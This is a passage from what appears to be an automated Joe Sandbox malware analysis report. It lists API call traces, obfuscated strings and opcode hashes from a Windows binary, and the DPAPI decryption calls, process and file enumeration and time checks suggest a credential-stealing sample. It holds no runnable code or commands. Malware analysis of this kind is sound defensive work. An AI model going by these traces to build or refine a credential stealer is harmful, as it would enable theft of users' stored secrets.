                              • StrCmpCA.SHLWAPI(?,010114FC), ref: 00FFE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FFEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 186747bf3344839a4bfe73d4d3bab7b9bacc51df0ec0cd12bc1090c4242b06b4
                              • Instruction ID: 61501fa770ffc68648f9b795dfb49909ea11df0914c374754c15f6f3da14f74c
                              • Opcode Fuzzy Hash: 186747bf3344839a4bfe73d4d3bab7b9bacc51df0ec0cd12bc1090c4242b06b4
                              • Instruction Fuzzy Hash: 72122371B10219DAEB16FB70DD95EED7338AF64300F4041A9A58A970D0EF346F49CBA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 34EW$P3y$^]oW$}iv!$}iv!$i^m
                              • API String ID: 0-3732504080
                              • Opcode ID: dc9b05953588d1b5895ce5bec05e5b3e10d99be6bf0c2eecf0cdb289f9eece47
                              • Instruction ID: 19be22cab2ac5ed6c622ae2e6143b7e374cda63d7c69ec2512f7ec2322a1d751
                              • Opcode Fuzzy Hash: dc9b05953588d1b5895ce5bec05e5b3e10d99be6bf0c2eecf0cdb289f9eece47
                              • Instruction Fuzzy Hash: 46B207F3A0C2149FD7046E2DEC8567ABBE9EF94720F1A493DEAC4C7744E63558008796
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .tSZ$7W-M$]WU$aln{$w+w$r3
                              • API String ID: 0-3914464318
                              • Opcode ID: b850f16eeb641383f7aaaee50cbccd7c6136bd74b92fb7c4b1e14c50ec8cbea4
                              • Instruction ID: 508198f73692b7fda417e121d6fa5cb18ad814a762f598a3da98b462b225566b
                              • Opcode Fuzzy Hash: b850f16eeb641383f7aaaee50cbccd7c6136bd74b92fb7c4b1e14c50ec8cbea4
                              • Instruction Fuzzy Hash: 43B2D4F360C200AFE308AE29EC8567AFBE9EF94720F16493DE6C587740E63558518797
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: *3.R$2Z?[$7n_$Qaa$`^?=$sp_}
                              • API String ID: 0-3093853941
                              • Opcode ID: 3e1e5a57e6e5e8d855aa18a8fc608bac59d5567d4aaa752456d689b022894747
                              • Instruction ID: 2d535091cb1ccbed8aaff5d2406155b47c1c6451a374ed8f2d991ee13e1f4fa7
                              • Opcode Fuzzy Hash: 3e1e5a57e6e5e8d855aa18a8fc608bac59d5567d4aaa752456d689b022894747
                              • Instruction Fuzzy Hash: 877208F36082049FE304AE2DEC8577ABBE9EF94720F1A453DEAC4C7744E63598058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 8@@"$P({$S1~+$Y-]~$qS?o
                              • API String ID: 0-2724045608
                              • Opcode ID: 81428c76408294c6e559e17ce109a2c035f1087437f137d535df0399946ccbef
                              • Instruction ID: dd9a6cf3c61c9e86aec2c6188c62c4ea64f48ecabe8bbecbc77cb7ddcb9ce341
                              • Opcode Fuzzy Hash: 81428c76408294c6e559e17ce109a2c035f1087437f137d535df0399946ccbef
                              • Instruction Fuzzy Hash: 4FB2F6F3A0C2109FE304AE2DEC85A7AB7E5EFD4720F1A893DE6C4C7744E63558058696
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FFC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FFC87C
                              • lstrcat.KERNEL32(?,01010B46), ref: 00FFC943
                              • lstrcat.KERNEL32(?,01010B47), ref: 00FFC957
                              • lstrcat.KERNEL32(?,01010B4E), ref: 00FFC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 6ef07471206c424d721999c1e671996d041b059f5c94d998f797857863883017
                              • Instruction ID: 3e806366da9f3beb4a3479076ea85cc39a05c58f9bbb171b0c03b0eb2b4b3b50
                              • Opcode Fuzzy Hash: 6ef07471206c424d721999c1e671996d041b059f5c94d998f797857863883017
                              • Instruction Fuzzy Hash: 1F418F7590421EDFCB20CF90D989BFEB7B8BF44304F1041A8E509A7284D7745A84DF91
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0100696C
                              • sscanf.NTDLL ref: 01006999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 010069B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 010069C0
                              • ExitProcess.KERNEL32 ref: 010069DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 8988028cfb893897a98df7d46e7c3e0c963a9d0528a370c582cb6faa9813eae8
                              • Instruction ID: 0d6163ae7cf657934ec788104a64ebe8b156c6f19ec19eae9051c47b6a29cdb6
                              • Opcode Fuzzy Hash: 8988028cfb893897a98df7d46e7c3e0c963a9d0528a370c582cb6faa9813eae8
                              • Instruction Fuzzy Hash: 99213EB5D10209ABDF04EFE4E949AEEB7B9FF48300F04852EE046E3244EB355604CB65
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FF724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FF7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FF7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00FF72A4
                              • LocalFree.KERNEL32(?), ref: 00FF72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 627bca2684ee4438e49848ec51c59470a7e3af217ce10d6f167de5ed2020ea38
                              • Instruction ID: 61b0e16a2ee540b2efac6f6be331c157be7c9d9083e434cedbb256e09c26c213
                              • Opcode Fuzzy Hash: 627bca2684ee4438e49848ec51c59470a7e3af217ce10d6f167de5ed2020ea38
                              • Instruction Fuzzy Hash: 90010075A40208BBEB24DB94DD4AFADB778BB44700F104158FB45EB2C4D670AA019B65
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0100961E
                              • Process32First.KERNEL32(01010ACA,00000128), ref: 01009632
                              • Process32Next.KERNEL32(01010ACA,00000128), ref: 01009647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0100965C
                              • CloseHandle.KERNEL32(01010ACA), ref: 0100967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: a7ca88999480a45b562e1b7878bba8fee2412accbf01035073021153f0be853a
                              • Instruction ID: fc6632bb3211cb83fcea9df360aecb91b23ca336348e6983acb6f4731f975d56
                              • Opcode Fuzzy Hash: a7ca88999480a45b562e1b7878bba8fee2412accbf01035073021153f0be853a
                              • Instruction Fuzzy Hash: E6010075A10208ABDB25DFA5DD48BDDBBF8EB4C704F004198A54AD7280DB349B40CF50
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00FF5184,40000001,00000000,00000000,?,00FF5184), ref: 01008EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 907110de3995f859af0350646c8560816cc0eab36575273d1aa26042ca41039c
                              • Instruction ID: 58e7daf8808cf342646316713d1e4ab18e84123aeb252269bd1b751ae9a1aa79
                              • Opcode Fuzzy Hash: 907110de3995f859af0350646c8560816cc0eab36575273d1aa26042ca41039c
                              • Instruction Fuzzy Hash: 1B110A70600205AFEB41CF64E888FBB33A9BF89300F00D459FA958B291D735E841DB60
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FF4EEE,00000000,00000000), ref: 00FF9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00FF4EEE,00000000,?), ref: 00FF9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FF4EEE,00000000,00000000), ref: 00FF9B2A
                              • LocalFree.KERNEL32(?,?,?,?,00FF4EEE,00000000,?), ref: 00FF9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 4a78520caa1c06c54d89defb7cbef3a3b3edc27a3bdb7a5e7c88f0758c9425e1
                              • Instruction ID: b36a797e57c16dacd246936c1b74c010e6dccfb68cb5384311e6157ef8720624
                              • Opcode Fuzzy Hash: 4a78520caa1c06c54d89defb7cbef3a3b3edc27a3bdb7a5e7c88f0758c9425e1
                              • Instruction Fuzzy Hash: 4111A4B4640208AFEB10CF64D899FAA77B5FB89710F208058FA159B3D4C7B5AA01DB50
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0198F760,00000000,?,01010E10,00000000,?,00000000,00000000), ref: 01007A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01007A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0198F760,00000000,?,01010E10,00000000,?,00000000,00000000,?), ref: 01007A7D
                              • wsprintfA.USER32 ref: 01007AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 5999ff9b2aa3972ee61f2ee0dcc9194565575f74eb27b867051d547420639eea
                              • Instruction ID: be244539f063034195fdad73371ee362fb1b0e22f720faee00764ddf0dea6477
                              • Opcode Fuzzy Hash: 5999ff9b2aa3972ee61f2ee0dcc9194565575f74eb27b867051d547420639eea
                              • Instruction Fuzzy Hash: 38118EB1945218EBEB208B94DC49FA9B7B8FB44721F0043AAE94A932C0C7781A84CF50
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1.v$Oqt~$](t{$e]u
                              • API String ID: 0-4114461045
                              • Opcode ID: 621f49fef06bc05e1d41ec4f101363ddd10fb5bb542c30f203b56178666581c7
                              • Instruction ID: 97a70cec39f260b1173871aad14ce3979f82efa03d4be22513787cff2c7cd66d
                              • Opcode Fuzzy Hash: 621f49fef06bc05e1d41ec4f101363ddd10fb5bb542c30f203b56178666581c7
                              • Instruction Fuzzy Hash: 4732D5F360C6049FE304AE2DEC8577AFBE9EF98320F16892DE6C5C7344EA3558118656
                              APIs
                              • CoCreateInstance.COMBASE(0100E118,00000000,00000001,0100E108,00000000), ref: 01003758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 010037B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 221fdf171c6bb866fe8064e0e7082d42197e62d5b1bce932c5aec6f1141221c4
                              • Instruction ID: d31b120520cf410393158ded4be5ed0cde9f18a8723357511918885586494ac6
                              • Opcode Fuzzy Hash: 221fdf171c6bb866fe8064e0e7082d42197e62d5b1bce932c5aec6f1141221c4
                              • Instruction Fuzzy Hash: 6D41F870A00A289FEB25DB58CC95BDBB7B4BB48702F4041D9E609EB2D0D7B16E85CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FF9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FF9BA3
                              • LocalFree.KERNEL32(?), ref: 00FF9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: da740208e4c7c495a8c5619eeaf3a24176b3617a97618bc26d49e20aa9b4ff64
                              • Instruction ID: af93884fbc1422d1f2dc3481eb10cfd868c0e31f7819f4d3e60bacf3334f8f72
                              • Opcode Fuzzy Hash: da740208e4c7c495a8c5619eeaf3a24176b3617a97618bc26d49e20aa9b4ff64
                              • Instruction Fuzzy Hash: 6D11CCB8A00209DFDB04DF94D989AAE77B5FF88300F104568E915A7354D774AE10CF61
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 57??$M=D
                              • API String ID: 0-3615813599
                              • Opcode ID: 1a945ca96a57811f196086ef3a414d1ab209d5321816693f2ada98d0ed206661
                              • Instruction ID: b237d58a7f449647eca9e88b28df94a99272bd88a31a762bd4bc7aac4d309b10
                              • Opcode Fuzzy Hash: 1a945ca96a57811f196086ef3a414d1ab209d5321816693f2ada98d0ed206661
                              • Instruction Fuzzy Hash: D3B2E7F36082009FE304AE2DDC8567AFBE9EFD4720F1A893DE6C5C7744EA3558018696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: By~w
                              • API String ID: 0-883207314
                              • Opcode ID: 25e3ecc18e1ebf5b233052bb2f85376ab15405fab93bd371f1a4e4fc68018194
                              • Instruction ID: c3290b48cc0b03497df65225fb5dd2d309e5ae4cfd012e200f10f7443536bc79
                              • Opcode Fuzzy Hash: 25e3ecc18e1ebf5b233052bb2f85376ab15405fab93bd371f1a4e4fc68018194
                              • Instruction Fuzzy Hash: 2A4229F3A0C214AFE3046E6DEC8567ABBE5EF94620F16853DEAC4D7740E63598018793
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 4a4
                              • API String ID: 0-1365780938
                              • Opcode ID: b2874224c21b67ee11b0cac2d6dedc6d62cc7edf73b769850fa6a18cca403fd6
                              • Instruction ID: 80ad1d5ee91716d6f62c41452540f1daeebe2d0529fe1ec5384ef50d9872b3da
                              • Opcode Fuzzy Hash: b2874224c21b67ee11b0cac2d6dedc6d62cc7edf73b769850fa6a18cca403fd6
                              • Instruction Fuzzy Hash: 0F02D4F36086009FE704AE2DDC8576ABBE6EFD8320F1A893DD6C4C3744E63598458697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 6jz;
                              • API String ID: 0-3583987407
                              • Opcode ID: 91ac0c501b2e249521ff69caccb407584d8157d7401ba534ec489ed7fe1aee3b
                              • Instruction ID: 7cb33f5c9c63b7da015c01bbd03a53a1a716cc1b0fd02893d082571ca90ac4fd
                              • Opcode Fuzzy Hash: 91ac0c501b2e249521ff69caccb407584d8157d7401ba534ec489ed7fe1aee3b
                              • Instruction Fuzzy Hash: 46416AF3E0512457E3186E3DDC4477ABBD6DB90360F1B463EEA8993780E9795D0582C2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: p=8w
                              • API String ID: 0-3208007975
                              • Opcode ID: 34d9b93727dfd4962055878fbee9efa1cbc7f51003b86267983ace41a3b9bcf9
                              • Instruction ID: 5be143e80eb3f6765a2bf808a6b6d574b921ce6c3a6013fe1b50e551b5da7702
                              • Opcode Fuzzy Hash: 34d9b93727dfd4962055878fbee9efa1cbc7f51003b86267983ace41a3b9bcf9
                              • Instruction Fuzzy Hash: F7E0B671E10608EFEB48CF98C78469C7BB1EB8A340F608065D546AB259D2704B459B00
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3f6fc14766c69bf065e5937ef7583a55470e2c9607c85ea23de8f5fc020c4167
                              • Instruction ID: 7e3c66d504fe759cf1a4c937cf80aa85974a285961d763b74cefbe15ef2aa619
                              • Opcode Fuzzy Hash: 3f6fc14766c69bf065e5937ef7583a55470e2c9607c85ea23de8f5fc020c4167
                              • Instruction Fuzzy Hash: 8D02F7F390C6049FE304AF28DC8567AFBE5EF94720F064A2DEAC987744E63559448B87
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6b001ea54cd719db48b7be768c4efd3ecd59760b42afe81b31ef386eea2b0b65
